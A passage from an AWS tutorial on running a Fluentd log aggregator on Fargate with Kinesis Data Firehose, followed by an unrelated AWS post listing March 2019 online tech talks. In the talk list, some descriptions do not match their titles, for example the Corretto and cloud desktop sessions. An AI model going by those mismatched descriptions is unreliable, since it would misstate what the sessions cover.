In this case, the tag is healthcheck. As you can see in the configuration file, the first <match> definition handles logs that have a tag that matches the pattern health*. Each <match> element defines a tag pattern and defines a destination for logs with tags that match that pattern. For the health check logs, the destination is null, because you do not want to store these dummy logs anywhere.

The Configure ECS tasks to send logs to the aggregator section of this post explains how log tags are defined with the Fluentd docker logging driver. The other <match> elements process logs for the applications in the VPC and send them to Kinesis Data Firehose.

One of them matches any log tag that begins with “frontend”, the other matches any tag that starts with “backend”. Each sends to a different delivery stream. Your frontend and and backend services can tag their logs and have them be sent to different destinations.

Fluentd lacks built in support for Kinesis Data Firehose, so use an open source plugin maintained by AWS: awslabs/aws-fluent-plugin-kinesis.

Finally, each of the Kinesis Data Firehose <match> tags define buffer settings with the <buffer> element. The Kinesis output plugin buffers data in memory if needed. These settings have been tuned to increase throughput and minimize the chance of data loss, though you should modify them as needed based upon your own testing. For a discussion on the throughput and performance of this setup, see the Aggregator performance and throughput section in this post.

Build the Fluentd Docker image

Download the Dockerfile, and place it in the same directory as the fluentd.conf file discussed earlier. The Dockerfile starts with the latest Fluentd image based on Alpine, and installs awslabs/aws-fluent-plugin-kinesis and curl (for the container health check discussed earlier).

In the same directory, create an empty directory named /plugins. This directory is left empty but is needed when building the Fluentd Docker image. For more information about building custom Fluentd Docker images, see the Fluentd page on DockerHub.

Build and tag the image:

docker build -t custom-fluentd:latest .

Push the image to an ECR repository so that it can be used in the Fargate service.

Deploy the Fluentd aggregator on Fargate

Download the CloudFormation template, which defines all the resources needed for the aggregator service. This includes the Network Load Balancer, target group, security group, and task definition.

First, create a cluster:

aws ecs create-cluster --cluster-name fargate-fluentd-tutorial

Second, create an Amazon ECS task execution IAM role. This allows the Fargate task to pull the Fluentd container image from ECR. It also allows the Fluentd Aggregator Tasks to log to Amazon CloudWatch. This is important: Fluentd can’t manage its own logs because that would be a circular dependency.

The template can then be launched into the VPC and private subnets created earlier. Add the required information as parameters:

aws cloudformation deploy --template-file template.yml --stack-name aggregator-service \
--parameter-overrides EnvironmentName=fluentd-aggregator-service \
DockerImage=<Repository URI used for the image built in Step 4> \
VPC=<your VPC ID> \
Subnets=<private subnet 1, private subnet 2> \
Cluster=fargate-fluentd-tutorial \
ExecutionRoleArn=<your task execution IAM role ARN> \
MinTasks=2 \
MaxTasks=4 \
--capabilities CAPABILITY_NAMED_IAM

MinTasks is set to 2, and MaxTasks is set to 4, which means that the aggregator always has at least two tasks.

When load increases, it can dynamically scale up to four tasks. Recall the discussion in Aggregator performance and throughput and set these values based upon your own expected log throughput.

Configure ECS tasks to send logs to the aggregator

First, get the DNS name of the load balancer created by the CloudFormation template. In the EC2 console, choose Load Balancers. The load balancer has the same value as the EnvironmentName parameter. In this case, it is fluentd-aggregator-service.

Create a container definition for a container that logs to the Fluentd aggregator by adding the appropriate values for logConfiguration. In the following example, replace the fluentd-address value with the DNS name for your own load balancer. Ensure that you add :24224 after the DNS name; the aggregator listens on TCP port 24224.

"logConfiguration": {
    "logDriver": "fluentd",
    "options": {
        "fluentd-address": "fluentd-aggregator-service-cfe858972373a176.elb.us-west-2.amazonaws.com:24224",
        "tag": "frontend-apache"
    }
}

Notice the tag value, frontend-apache. This is how the tag discussed earlier is set. This tag matches the pattern frontend*, so the Fluentd aggregator sends it to the delivery stream for “frontend” logs.

Finally, your container instances need the following user data to enable the Fluentd log driver in the ECS agent:

#!/bin/bash
echo "ECS_AVAILABLE_LOGGING_DRIVERS=[\"awslogs\",\"fluentd\"]" >> /etc/ecs/ecs.config

Conclusion

In this post, I showed you how to build a log aggregator using AWS Fargate, Amazon Kinesis Data Firehose, and Fluentd.

To learn how to use the aggregator with applications that do not run on ECS, I recommend reading All Data Are Belong to AWS: Streaming upload via Fluentd from Kiyoto Tamura, a maintainer of Fluentd.

Learn about AWS Services & Solutions – March AWS Online Tech Talks

Post Syndicated from Robin Park original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-march-aws-online-tech-talks/

AWS Tech Talks

Join us this March to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

Compute

March 26, 2019 | 11:00 AM – 12:00 PM PTTechnical Deep Dive: Running Amazon EC2 Workloads at Scale – Learn how you can optimize your workloads running on Amazon EC2 for cost and performance, all while handling peak demand.

March 27, 2019 | 9:00 AM – 10:00 AM PTIntroduction to AWS Outposts – Learn how you can run AWS infrastructure on-premises with AWS Outposts for a truly consistent hybrid experience.

March 28, 2019 | 1:00 PM – 2:00 PM PTDeep Dive on OpenMPI and Elastic Fabric Adapter (EFA) – Learn how you can optimize your workloads running on Amazon EC2 for cost and performance, all while handling peak demand.

Containers

March 21, 2019 | 11:00 AM – 12:00 PM PTRunning Kubernetes with Amazon EKS – Learn how to run Kubernetes on AWS with Amazon EKS.

March 22, 2019 | 9:00 AM – 10:00 AM PTDeep Dive Into Container Networking – Dive deep into microservices networking and how you can build, secure, and manage the communications into, out of, and between the various microservices that make up your application.

Data Lakes & Analytics

March 19, 2019 | 9:00 AM – 10:00 AM PTFuzzy Matching and Deduplicating Data with ML Transforms for AWS Lake Formation – Learn how to use ML Transforms for AWS Glue to link and de-duplicate matching records.

March 20, 2019 | 9:00 AM – 10:00 AM PTCustomer Showcase: Perform Real-time ETL from IoT Devices into your Data Lake with Amazon Kinesis – Learn best practices for how to perform real-time extract-transform-load into your data lake with Amazon Kinesis.

March 20, 2019 | 11:00 AM – 12:00 PM PTMachine Learning Powered Business Intelligence with Amazon QuickSight – Learn how Amazon QuickSight leverages powerful ML and natural language capabilities to generate insights that help you discover the story behind the numbers.

Databases

March 18, 2019 | 9:00 AM – 10:00 AM PTWhat’s New in PostgreSQL 11 – Find out what’s new in PostgreSQL 11, the latest major version of the popular open source database, and learn about AWS services for running highly available PostgreSQL databases in the cloud.

March 19, 2019 | 1:00 PM – 2:00 PM PTIntroduction on Migrating your Oracle/SQL Server Databases over to the Cloud using AWS’s New Workload Qualification Framework – Get an introduction on how AWS’s Workload Qualification Framework can help you with your application and database migrations.

March 20, 2019 | 1:00 PM – 2:00 PM PTWhat’s New in MySQL 8 – Find out what’s new in MySQL 8, the latest major version of the world’s most popular open source database, and learn about AWS services for running highly available MySQL databases in the cloud.

March 21, 2019 | 9:00 AM – 10:00 AM PTBuilding Scalable & Reliable Enterprise Apps with AWS Relational Databases – Learn how AWS Relational Databases can help you build scalable & reliable enterprise apps.

DevOps

March 19, 2019 | 11:00 AM – 12:00 PM PTIntroduction to Amazon Corretto: A No-Cost Distribution of OpenJDK – Learn how to transform your approach to secure desktop delivery with a cloud desktop solution like Amazon WorkSpaces.

End-User Computing

March 28, 2019 | 9:00 AM – 10:00 AM PTFireside Chat: Enabling Today’s Workforce with Cloud Desktops – Learn about the tools and best practices Amazon Redshift customers can use to scale storage and compute resources on-demand and automatically to handle growing data volume and analytical demand.

Enterprise

March 26, 2019 | 1:00 PM – 2:00 PM PTSpeed Your Cloud Computing Journey With the Customer Enablement Services of AWS: ProServe, AMS, and Support – Learn how to accelerate your cloud journey with AWS’s Customer Enablement Services.

IoT

March 26, 2019 | 9:00 AM – 10:00 AM PTHow to Deploy AWS IoT Greengrass Using Docker Containers and Ubuntu-snap – Learn how to bring cloud services to the edge using containerized microservices by deploying AWS IoT Greengrass to your device using Docker containers and Ubuntu snaps.

Machine Learning

March 18, 2019 | 1:00 PM – 2:00 PM PTOrchestrate Machine Learning Workflows with Amazon SageMaker and AWS Step Functions – Learn about how ML workflows can be orchestrated with the rich features of Amazon SageMaker and AWS Step Functions.

March 21, 2019 | 1:00 PM – 2:00 PM PTExtract Text and Data from Any Document with No Prior ML Experience – Learn how to extract text and data from any document with no prior machine learning experience.

March 22, 2019 | 11:00 AM – 12:00 PM PTBuild Forecasts and Individualized Recommendations with AI – Learn how you can build accurate forecasts and individualized recommendation systems using our new AI services, Amazon Forecast and Amazon Personalize.

Management Tools

March 29, 2019 | 9:00 AM – 10:00 AM PTDeep Dive on Inventory Management and Configuration Compliance in AWS – Learn how AWS helps with effective inventory management and configuration compliance management of your cloud resources.

Networking & Content Delivery

March 25, 2019 | 1:00 PM – 2:00 PM PTApplication Acceleration and Protection with Amazon CloudFront, AWS WAF, and AWS Shield – Learn how to secure and accelerate your applications using AWS’s Edge services in this demo-driven tech talk.

Robotics

March 28, 2019 | 11:00 AM – 12:00 PM PTBuild a Robot Application with AWS RoboMaker – Learn how to improve your robotics application development lifecycle with AWS RoboMaker.

Security, Identity, & Compliance

March 27, 2019 | 11:00 AM – 12:00 PM PTRemediating Amazon GuardDuty and AWS Security Hub Findings – Learn how to build and implement remediation automations for Amazon GuardDuty and AWS Security Hub.

March 27, 2019 | 1:00 PM – 2:00 PM PTScaling Accounts and Permissions Management – Learn how to scale your accounts and permissions management efficiently as you continue to move your workloads to AWS Cloud.

Serverless

March 18, 2019 | 11:00 AM – 12:00 PM PT Testing and Deployment Best Practices for AWS Lambda-Based Applications – Learn best practices for testing and deploying AWS Lambda based applications.

Storage

March 25, 2019 | 11:00 AM – 12:00 PM PT Introducing a New Cost-Optimized Storage Class for Amazon EFS – Come learn how the new Amazon EFS storage class and Lifecycle Management automatically reduces cost by up to 85% for infrequently accessed files.